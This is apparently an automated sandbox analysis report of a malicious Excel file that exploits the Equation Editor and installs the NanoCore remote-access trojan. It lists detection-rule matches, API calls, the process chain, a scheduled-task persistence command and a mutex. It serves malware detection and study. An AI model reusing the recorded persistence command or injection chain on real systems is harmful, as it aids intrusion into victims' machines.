Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FF59E6 appears 65 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC6B90 appears 39 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC14F7 appears 36 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027E2F0 appears 31 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D940 appears 51 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D870 appears 35 times

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Import order764536.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@16/49@20/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266D06 GetLastError,FormatMessageW,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ........................................(.P.............p.......x.......H................................................................. .....

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: unknown	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD47D.tmp

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101E0F6 CoInitialize,CoCreateInstance,CoUninitialize,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}

Source: C:\Users\Public\vbc.exe	Command line argument: ps*
Source: C:\Users\Public\vbc.exe	Command line argument: sfxname
Source: C:\Users\Public\vbc.exe	Command line argument: sfxstime
Source: C:\Users\Public\vbc.exe	Command line argument: STARTDLG

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
